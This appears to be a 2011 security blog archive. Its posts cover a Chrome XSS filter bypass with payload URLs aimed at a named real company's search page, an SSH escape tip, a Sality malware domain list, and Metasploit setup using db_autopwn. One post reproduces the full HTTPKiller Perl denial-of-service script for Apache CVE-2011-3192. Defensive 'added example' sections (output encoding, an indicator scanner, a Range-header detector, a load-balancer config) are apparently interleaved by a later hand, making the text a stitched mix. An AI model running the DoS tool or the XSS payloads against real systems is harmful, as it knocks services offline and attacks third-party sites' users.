Friday, September 16, 2011

Bypassing Chrome's XSS filter

When it comes to security, keep in mind that there will always be an alternative path around a protection; you just have to find it.

In this post I will show how Nick Nikiforakis found such an alternative path around Google Chrome's XSS filter.

Chrome's filter blocks any XSS attempt in the pages you open. Let's run two tests, using Chrome and Firefox.

The URL below is vulnerable to XSS; it shows the number 1 in a pop-up window.

Open the URL below in Firefox and then in Chrome.

http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&noMimimumKeywords=false

Notice that in Firefox the pop-up appeared, but in Chrome it was blocked by the filter.

Nick's initial idea was to omit the closing script tag, so that the page's HTML ends up inside the script; that fails, since JavaScript does not parse HTML. He then wrapped that HTML in a JavaScript comment (/* &b=*/) so that the script does run, and it worked.

Bypassing Chrome's XSS filter:

Now let's open our URL in both browsers using this little "trick".

http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site="><script>alert(1);/*&noMimimumKeywords=*/</script>

Notice that it ran in both Firefox and Chrome.

source: http://blog.securitee.org/?p=37
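Browser-side filters like Chrome's are a defence-in-depth layer; the bug itself is fixed on the server by encoding the reflected parameter for the context it lands in. The following is an added example, not code from the post or from the site it discusses: a Python stand-in for a page that reflects the search-site parameter into a double-quoted attribute (an assumption inferred from the payloads' leading `">`, which breaks out of exactly that context), rendered raw and then encoded, plus a second renderer for the case where the value lands inside a script block. Both payloads from the post are used as input.

```python
"""Contextual output encoding for a reflected search parameter.

Added example (not the post's code, nor the site's): a minimal stand-in for
a page that reflects the search-site parameter into a double-quoted
attribute. Rendering it raw reproduces the bug; encoding for the attribute
context makes both payloads inert, whatever the browser's XSS filter does.
"""
import html
import json

# Assumed reflection context (not taken from the real page).
TEMPLATE = '<input type="text" name="search-site" value="{value}">'

# The two payloads from the post: plain, and with the /* */ comment trick.
PLAIN_PAYLOAD = '"><script>alert(1);</script>'
TRICK_PAYLOAD = '"><script>alert(1);/*&noMimimumKeywords=*/</script>'


def render_unsafe(value: str) -> str:
    """Vulnerable: the raw parameter is spliced straight into the markup."""
    return TEMPLATE.format(value=value)


def render_safe(value: str) -> str:
    """Hardened: encode for the HTML attribute context.

    html.escape(quote=True) rewrites & < > " ' as entities, so the browser
    never sees a closing quote or a new tag.
    """
    return TEMPLATE.format(value=html.escape(value, quote=True))


def render_safe_js_string(value: str) -> str:
    """Hardened for a different context: the value inside a <script> string literal.

    JSON encoding handles quotes and backslashes; escaping < and > as \\u003c
    and \\u003e keeps a literal </script> in the value from ending the block.
    """
    js_literal = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var q = " + js_literal + ";</script>"


def contains_script_element(markup: str) -> bool:
    """Self-check helper: does the rendered markup contain a <script> start tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for payload in (PLAIN_PAYLOAD, TRICK_PAYLOAD):
        print("raw:    ", render_unsafe(payload))
        print("encoded:", render_safe(payload))
        print("js ctx: ", render_safe_js_string(payload))
```

The point of the two hardened renderers is that the encoding must match the context: attribute encoding would be wrong inside a script block, and JSON encoding alone would be wrong inside an attribute.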

Disconnect Stalled SSH Session

A very good tip:

This doesn't really apply to Windows users as you can just close puTTy. But for everyone else, stalled SSH Sessions suck. You are either slamming enter to get it to realize it's been disconnected or just waiting for it to. Well, for those of us who are impatient just hit:
~.
That's right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.
Stupid trick, but I use it all the time (especially on spotty MiFi connections).

The ~ is the escape character, similar to Ctrl+A in screen. If you try ~?, you get the following dialogue:
$ ~?
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Another very useful trick is to use ~C to open a command line, then use -L or -R to add additional SSH forwarding tunnels without breaking your existing SSH connection.


source: http://www.room362.com/blog/2011/9/15/disconnect-stalled-ssh-session.html

Friday, September 9, 2011

McAfee Labs - Combating Threats - W32/Sality Virus

According to the McAfee paper called Combating Threats - W32/Sality Virus, below is the list of domains that Sality contacts:


hxxp://89.119.67.154
hxxp://kukutrustnet777.info
hxxp://kukutrustnet888.info
hxxp://kukutrustnet987.info
hxxp://www.kjwre9fqwieluoi.info
hxxp://bpowqbvcfds677.info
hxxp://bmakemegood24.com
hxxp://bperfectchoice1.com
hxxp://bcash-ddt.net
hxxp://bddr-cash.net
hxxp://btrn-cash.net
hxxp://bmoney-frn.net
hxxp://bclr-cash.net
hxxp://bxxxl-cash.net
hxxp://balsfhkewo7i487fksd.info
hxxp://buynvf96.info
1.yimg.com
Us.i1.yimg.com
http:.//ad.yieldmanager.com
mattfoll.eu.interia.pl
bjerm.mass.hc.ru
www.f5ds1jkkk4d.info
www.g1ikdcvns3sdsal.info
www.h7smcnrwlsdn34fgv.info
www.inform1ongung.info
www.kukutrustnet.org
www.lukki6nd2kdnc.info


With this information you can detect machines possibly infected with Sality using tcpdump, or add these domains to your border firewall.
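To turn the list into a check, here is an added example (not from the post or the McAfee paper): the indicators above are normalised into a blocklist and matched against tcpdump -n style lines, both DNS queries and TCP connection attempts to the listed IP. The capture lines are constructed for the example and are not real traffic. A caveat worth building in: 1.yimg.com, us.i1.yimg.com and ad.yieldmanager.com are shared Yahoo CDN / ad-network hosts that plenty of clean machines talk to, so the example reports those matches as low confidence rather than as an infection on their own.

```python
"""Matching the Sality indicators above against tcpdump output (added example)."""
import re

# Indicators exactly as listed in the post (defanged "hxxp://" kept).
SALITY_IOCS_RAW = """
hxxp://89.119.67.154
hxxp://kukutrustnet777.info
hxxp://kukutrustnet888.info
hxxp://kukutrustnet987.info
hxxp://www.kjwre9fqwieluoi.info
hxxp://bpowqbvcfds677.info
hxxp://bmakemegood24.com
hxxp://bperfectchoice1.com
hxxp://bcash-ddt.net
hxxp://bddr-cash.net
hxxp://btrn-cash.net
hxxp://bmoney-frn.net
hxxp://bclr-cash.net
hxxp://bxxxl-cash.net
hxxp://balsfhkewo7i487fksd.info
hxxp://buynvf96.info
1.yimg.com
Us.i1.yimg.com
http:.//ad.yieldmanager.com
mattfoll.eu.interia.pl
bjerm.mass.hc.ru
www.f5ds1jkkk4d.info
www.g1ikdcvns3sdsal.info
www.h7smcnrwlsdn34fgv.info
www.inform1ongung.info
www.kukutrustnet.org
www.lukki6nd2kdnc.info
"""

# Shared infrastructure (Yahoo CDN / ad network): a hit here is weak evidence.
LOW_CONFIDENCE = {"1.yimg.com", "us.i1.yimg.com", "ad.yieldmanager.com"}


def normalize(ioc: str) -> str:
    """Drop the (defanged or real) scheme, including the post's 'http:.//' typo, and any path."""
    ioc = ioc.strip().lower()
    ioc = re.sub(r"^(?:hxxps?|https?):\.?//", "", ioc)
    return ioc.split("/")[0]


def blocklist() -> list:
    """Normalised, de-duplicated indicators, ready for a firewall or DNS blocklist."""
    return sorted({normalize(x) for x in SALITY_IOCS_RAW.splitlines() if x.strip()})


IOC_IPS = {x for x in blocklist() if re.fullmatch(r"\d+(?:\.\d+){3}", x)}
IOC_DOMAINS = set(blocklist()) - IOC_IPS

# tcpdump -n line shape: "<ts> IP <src>.<port> > <dst>.<port>: <rest>"
LINE_RE = re.compile(r"^\S+ IP (\d+(?:\.\d+){3})\.\d+ > (\d+(?:\.\d+){3})\.\d+: (.*)$")
DNS_QUERY_RE = re.compile(r"\b(?:A|AAAA)\? (\S+?)\.? ")


def matched_domain(name: str):
    """Return the indicator that a queried name equals or is a subdomain of, else None."""
    for dom in IOC_DOMAINS:
        if name == dom or name.endswith("." + dom):
            return dom
    return None


def scan_tcpdump(lines) -> list:
    """Return (source_ip, indicator, confidence) for every line touching an indicator."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst, rest = m.groups()
        if dst in IOC_IPS:                       # direct connection to the listed IP
            hits.append((src, dst, "high"))
        q = DNS_QUERY_RE.search(rest)           # DNS lookup of a listed name
        if q:
            dom = matched_domain(q.group(1).lower())
            if dom:
                hits.append((src, dom, "low" if dom in LOW_CONFIDENCE else "high"))
    return hits


# Constructed sample capture (private / documentation addresses), not real traffic.
SAMPLE_TCPDUMP = """\
10:15:01.000001 IP 192.168.1.23.51234 > 192.168.1.1.53: 12345+ A? kukutrustnet777.info. (38)
10:15:01.000002 IP 192.168.1.1.53 > 192.168.1.23.51234: 12345 1/0/0 A 203.0.113.7 (54)
10:15:02.000003 IP 192.168.1.23.51235 > 89.119.67.154.80: Flags [S], seq 1, win 8192, length 0
10:15:03.000004 IP 192.168.1.42.51236 > 192.168.1.1.53: 23456+ A? www.example.com. (33)
10:15:04.000005 IP 192.168.1.42.51237 > 192.168.1.1.53: 23457+ A? us.i1.yimg.com. (32)
10:15:05.000006 IP 192.168.1.77.51238 > 192.168.1.1.53: 34567+ A? www.kukutrustnet.org. (38)
"""

if __name__ == "__main__":
    for src, ioc, conf in scan_tcpdump(SAMPLE_TCPDUMP.splitlines()):
        print(f"{src} -> {ioc} [{conf}]")
```

To use it on a live capture, pipe `tcpdump -n -l` output into the script line by line; the regexes assume the default `-n` numeric format shown in the sample.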


Monday, September 5, 2011

Installing and configuring MySQL for use with Metasploit 4

I recently installed Metasploit 4 on Ubuntu 11.04 and, to my surprise, database support is not enabled by default. I believe I have shown how to do this in other posts; even at the risk of being a little repetitive, I am sure this post will help a lot of people. I will show how to install and configure MySQL for use by Metasploit 4, on Ubuntu 11.04.

Step 1: Download Metasploit 4

download link (http://www.metasploit.com/download/)

download the Linux version described as:

Full Setup Includes dependencies,
Console 2, Java & Postgres

Step 2: Installing

Make the file executable:

#chmod +x framework-4.0.0-linux-full.run

Now install Metasploit:

#./framework-4.0.0-linux-full.run

Install the Ruby dependencies:

#apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

Step 3: Installing MySQL

#apt-get install mysql-server

It will ask for the database password; for this post I will use 123456 as the password.

#apt-get install rubygems libmysqlclient-dev
#gem install mysql

Configure Metasploit to connect to MySQL at startup:

#cat > ~/.msf4/msfconsole.rc <<'EOF'
db_driver mysql
db_connect root:123456@127.0.0.1:3306/msf_database
EOF



Done: we now have Metasploit 4 running with MySQL database support.

Now we can use db_nmap and db_autopwn.

example:

msf > db_nmap -n -sV 192.168.1.1
msf > db_autopwn -p -t -e -r

Simple like a hacker day with skills.


by Osvaldo

Thursday, September 1, 2011

Apache < 2.2.20 vulnerable to DoS (CVE-2011-3192)


Apache web server versions below 2.2.20 are vulnerable to DoS (multiple ranges DoS). The vulnerability has CVE ID CVE-2011-3192. A simple Perl script that exploits it, consuming the server's CPU and memory, has already been published.

Below is the Perl code that exploits this vulnerability:


# HTTPKiller - FHTTP Kit by Xianur0
# Copyright (C) 2011 Oscar García López (http://hackingtelevision.blogspot.com)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see .
#  
#    xianur0.null@gmail.com
#    http://hackingtelevision.blogspot.com/

package control;

my $ip;


sub new {
    my ($class,$i) = @_;
    $ip = $i;
    my $self={};
    $ip = $i;
    bless $self, $class;
    return $self;
}

sub mas {
my ($self,$veces) = @_;
$veces = 1 if($veces eq "");
my ($a,$e,$o,$b) = split(/\./,$ip);
for($as=0;$as<$veces;$as++) {
$b++;
if($b>=255) {$b=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
die("No mas IPs!\n") if($a>=255);
}
$ip = join "",$a,".",$e,".",$o,".",$b;
return $ip;
}

1;

package main;

use Socket;
use IO::Socket::INET;
use threads ('yield',
'exit' => 'threads_only',
'stringify');
use threads::shared;

my $ua = "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0";
my $method = "HEAD";
my $hilo;
my @vals = ('a','b','c','d','e','f','g','h','i','j','k','l','n','o','p','q','r','s','t','u','w','x','y','z',0,1,2,3,4,5,6,7,8,9);
my $randsemilla = "";
for($i = 0; $i < 30; $i++) {
$randsemilla .= $vals[int(rand($#vals))];
}
sub socker {
my ($remote,$port) = @_;
my ($iaddr, $paddr, $proto);
$iaddr = inet_aton($remote) || return false;
$paddr = sockaddr_in($port, $iaddr) || return false;
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) || return false;
return SOCK;
}


sub sender {
my ($max,$puerto,$host,$file) = @_;
my $sock;
while(true) {
my $paquete = "";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $puerto, Proto => 'tcp');
unless($sock) {
print "\n[x] Unable to connect...\n\n";
sleep(1);
next;
}
for($i=0;$i<$porconexion;$i++) {
$ipinicial = $sumador->mas();
my $filepath = $file;
$filepath =~ s/(\{mn\-fakeip\})/$ipinicial/g;
$paquete .= join "",$method," /",$filepath," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nCLIENT-IP: ",$ipinicial,"\r\nX-Forwarded-For: ",$ipinicial,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
}
$paquete =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
print $sock $paquete;
}
}

sub sender2 {
my ($puerto,$host,$paquete) = @_;
my $sock;
my $sumador :shared;
while(true) {
$sock = &socker($host,$puerto);
unless($sock) {
print "\n[x] Unable to connect...\n\n";
next;
}
print $sock $paquete;
}
}

sub comenzar {
$SIG{'KILL'} = sub { print "Killed...\n"; threads->exit(); };
$url = $ARGV[0];
print "URL: ".$url."\n";
$max = $ARGV[1];
$porconexion = $ARGV[2];
$ipfake = $ARGV[3];
if($porconexion < 1) {
print "[-]Invalid arg 3...\n";
exit;
}
if($url !~ /^http:\/\//) {
die("[x] Invalid URL!\n");
}
$url .= "/" if($url =~ /^http?:\/\/([\d\w\:\.-]*)$/);
($host,$file) = ($url =~ /^http?:\/\/(.*?)\/(.*)/);
$puerto = 80;
($host,$puerto) = ($host =~ /(.*?):(.*)/) if($host =~ /(.*?):(.*)/);
$file =~ s/\s/%20/g;
print join "","[!] Launching ",$max," threads!\n";
$file = "/".$file if($file !~ /^\//);
print join "","Target: ",$host,":",$puerto,"\nPath: ",$file,"\n\n";
# then a single packet will do; no point in generating one per thread :)...
if($ipfake eq "") {
# repeated send
my $paquetebase = join "",$method," /",$file," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
$paquetesender = "";
$paquetesender = $paquetebase x $porconexion;
$paquetesender =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender2', ($puerto,$host,$paquetesender));
}
} else {
# send with IP...
$sumador = control->new($ipfake);
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender', ($porconexion,$puerto,$host,$file));
}
}
print "[-] Launched!\n";
for($v=0;$v<$max;$v++) {
if ($thr[$v]->is_running()) {
sleep(3);
$v--;
}
}
print "Fin!\n";
}


if($#ARGV > 2) {
comenzar();
} else {
die("Use: mn.pl [url] [Connections] [Requests per connection] [Initial false IP (optional)]\n");
}
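On the defending side, CVE-2011-3192 is triggered by a Range (or Request-Range) header that lists a large number of byte ranges, which is what makes the server burn CPU and memory. The following is an added example, not from the post or from the Apache project: a small parser that counts the ranges in such a header so a reverse proxy or a log-review script can flag a request before it reaches an unpatched backend. MAX_RANGES is an assumed threshold, and the sample requests are constructed for the example.

```python
"""Flagging Range headers with many byte ranges (added example for CVE-2011-3192)."""
import re
from typing import List, Optional, Tuple

MAX_RANGES = 5  # assumed threshold; normal clients send one or a handful of ranges

RANGE_SPEC_RE = re.compile(r"^(\d*)-(\d*)$")


def parse_range_header(value: str) -> List[Tuple[Optional[int], Optional[int]]]:
    """Parse 'bytes=a-b,c-,-d' into (start, end) pairs; raise ValueError if malformed."""
    m = re.fullmatch(r"\s*bytes\s*=\s*(.+)", value, flags=re.IGNORECASE)
    if not m:
        raise ValueError("not a byte-range header")
    ranges = []
    for spec in m.group(1).split(","):
        spec = spec.strip()
        rm = RANGE_SPEC_RE.match(spec)
        if not rm or (rm.group(1) == "" and rm.group(2) == ""):
            raise ValueError(f"malformed range spec: {spec!r}")
        start = int(rm.group(1)) if rm.group(1) else None
        end = int(rm.group(2)) if rm.group(2) else None
        ranges.append((start, end))
    return ranges


def range_count(value: str) -> int:
    """Number of byte ranges requested by one header value."""
    return len(parse_range_header(value))


def is_abusive(headers: dict, max_ranges: int = MAX_RANGES) -> bool:
    """True when Range or Request-Range (names matched case-insensitively) lists too many ranges.

    Malformed headers are not counted here; the origin server will reject them
    with a 400 anyway, and they do not trigger the range-merging code path.
    """
    for name, value in headers.items():
        if name.lower() in ("range", "request-range"):
            try:
                if range_count(value) > max_ranges:
                    return True
            except ValueError:
                continue
    return False


# Constructed requests for the self-check (header dicts as a proxy would see them).
NORMAL_REQUEST = {"Host": "example.com", "Range": "bytes=0-1023,2048-4095"}
ABUSIVE_REQUEST = {
    "Host": "example.com",
    "range": "bytes=" + ",".join(f"5-{i}" for i in range(1300)),
}

if __name__ == "__main__":
    for label, req in (("normal", NORMAL_REQUEST), ("abusive", ABUSIVE_REQUEST)):
        print(label, "->", "flag" if is_abusive(req) else "pass")
```

The same count is what the Apache project's interim mitigation expressed as a rewrite rule on the Range header; the permanent fix is upgrading to 2.2.20 or later, as the post's title says.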

Be aware of the consequences of your actions.

by Osvaldo




Load Balancing Apache Server

The Network NUTS videos and posts are excellent; I'm already a fan of these guys. Here is an interesting video about load balancing.



Take this - I have more than one APACHE server. I want to have load balancing between my apache servers. So whenever a HTTP/HTTPS request comes in, the request should be forwarded to all apache servers in a distributed manner. And also I want to hide my apache server IP from Internet and Intranet.

How to do this?

Welcome - POUND.

1. Pound is a reverse proxy load balancing server. 

2. It takes the request from HTTP/HTTPS clients and distributes them to one or more web servers.

3. It can detect when the backend server (actual apache server) fails / recovers and takes a decision accordingly.

4. Priority can be set. Default is 5. Range is 1 - 9. 

5. Higher priority servers are used more.

Consider this picture:


[Figure pound.jpeg: Pound Gateway used for Load Balancing between Apache Servers]


Here I want my Pound Gateway running on 172.24.0.254 to distribute the HTTP/HTTPS requests to two hidden APACHE servers running on 172.24.0.10 and 172.24.0.11, and further I want more requests to be catered by 172.24.0.10 as it has better hardware compared to 172.24.0.11.

STEP #1 - Install Pound on 172.24.0.254 - You can easily download "pound" from Internet.

STEP #2 - Configure the main configuration file for pound "/etc/pound.cfg", as shown:


[Figure pound2.jpeg: Pound configuration showing load balancing between two apache servers.]


STEP #3 - After the configuration is done, just restart the "pound" service.


Enjoy.

God Bless.


by alok on Mon Apr 05, 2010 11:36 am


source: http://networknuts.net/forum/viewtopic.php?f=3&t=256&sid=e0fbdbf9c21050d0392192c987e7b6d9
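The screenshot of /etc/pound.cfg did not survive, so here is an added configuration example (not alok's file, nor anything from the Pound project's docs) that implements the setup his post describes: the gateway listens on 172.24.0.254 and forwards to the two hidden backends, with 172.24.0.10 at a higher priority so it receives more requests. The listen and backend ports, the priority values (within the 1-9 range the post gives), the service account and the health-check interval are assumptions.

```text
# /etc/pound.cfg  (added example; values assumed from the post's description)
User        "www-data"
Group       "www-data"
LogLevel    1
Alive       30          # seconds between backend health checks (fail / recover detection)

ListenHTTP
    Address 172.24.0.254
    Port    80

    Service
        BackEnd
            Address  172.24.0.10
            Port     80
            Priority 9          # better hardware: gets more of the requests
        End
        BackEnd
            Address  172.24.0.11
            Port     80
            Priority 5          # the default priority
        End
    End
End
```

Because clients only ever see 172.24.0.254, the backend addresses stay hidden from both the Internet and the intranet, which is the other requirement in the post. For the HTTPS side, a ListenHTTPS block with a Cert directive pointing at the gateway's certificate would be added alongside the ListenHTTP block, so that TLS terminates on the gateway rather than on the hidden servers.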